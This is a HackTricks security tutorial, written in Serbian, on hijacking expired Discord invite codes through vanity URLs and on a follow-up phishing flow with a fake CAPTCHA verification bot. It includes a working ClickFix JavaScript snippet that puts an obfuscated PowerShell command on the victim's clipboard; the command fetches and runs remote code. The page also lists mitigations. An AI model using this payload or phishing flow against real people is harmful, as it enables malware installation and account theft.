Discord Invite Hijacking

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Ranljivost Discord-ovog sistema za poziv omogućava pretnjama da preuzmu istekao ili obrisan pozivni kod (privremeni, trajni ili prilagođeni) kao nove prilagođene linkove na bilo kojem serveru sa Level 3 pojačanjem. Normalizovanjem svih kodova na mala slova, napadači mogu unapred registrovati poznate pozivne kodove i tiho preuzeti saobraćaj kada originalni link istekne ili kada izvorni server izgubi svoje pojačanje.

Tipovi poziva i rizik od preuzimanja

Tip pozivaMoguće preuzimanje?Uslov / Komentari
Privremeni pozivni linkNakon isteka, kod postaje dostupan i može se ponovo registrovati kao prilagođeni URL od strane pojačanog servera.
Trajni pozivni link⚠️Ako je obrisan i sastoji se samo od malih slova i cifara, kod može ponovo postati dostupan.
Prilagođeni linkAko izvorni server izgubi svoje Level 3 pojačanje, njegov prilagođeni poziv postaje dostupan za novu registraciju.

Koraci eksploatacije

  1. Istraživanje
  • Pratite javne izvore (forume, društvene mreže, Telegram kanale) za pozivne linkove koji odgovaraju obrascu discord.gg/{code} ili discord.com/invite/{code}.
  • Prikupite pozivne kodove od interesa (privremene ili prilagođene).
  1. Pre-registration
  • Kreirajte ili koristite postojeći Discord server sa privilegijama Level 3 pojačanja.
  • U Server Settings → Vanity URL, pokušajte da dodelite ciljni pozivni kod. Ako bude prihvaćen, kod je rezervisan od strane zlonamernog servera.
  1. Aktivacija preuzimanja
  • Za privremene pozive, sačekajte da originalni poziv istekne (ili ga ručno obrišite ako kontrolišete izvor).
  • Za kodove koji sadrže velika slova, varijanta sa malim slovima može se odmah preuzeti, iako preusmeravanje aktivira tek nakon isteka.
  1. Tiho preusmeravanje
  • Korisnici koji posete stari link se neprimetno šalju na server pod kontrolom napadača kada je preuzimanje aktivno.

Phishing tok putem Discord servera

  1. Ograničite kanale servera tako da je vidljiv samo #verify kanal.
  2. Postavite bota (npr., Safeguard#0786) da podstakne novajlije da se verifikuju putem OAuth2.
  3. Bot preusmerava korisnike na phishing sajt (npr., captchaguard.me) pod izgovorom CAPTCHA ili koraka verifikacije.
  4. Implementirajte ClickFix UX trik:
  • Prikazujte poruku o pokvarenom CAPTCHA.
  • Uputite korisnike da otvore Win+R dijalog, nalepite unapred učitanu PowerShell komandu i pritisnu Enter.

ClickFix Clipboard Injection Example

javascript
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

Ovaj pristup izbegava direktno preuzimanje fajlova i koristi poznate UI elemente kako bi smanjio sumnju korisnika.

Mogućnosti ublažavanja

  • Koristite trajne pozivnice koje sadrže barem jedno veliko slovo ili ne-alfanumerički karakter (nikada ne isteknu, ne mogu se ponovo koristiti).
  • Redovno menjajte pozivne kodove i opozovite stare linkove.
  • Pratite status pojačanja Discord servera i tvrdnje o vanity URL-ovima.
  • Obrazujte korisnike da provere autentičnost servera i izbegavaju izvršavanje komandi koje su kopirane iz međuspremnika.

Reference

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks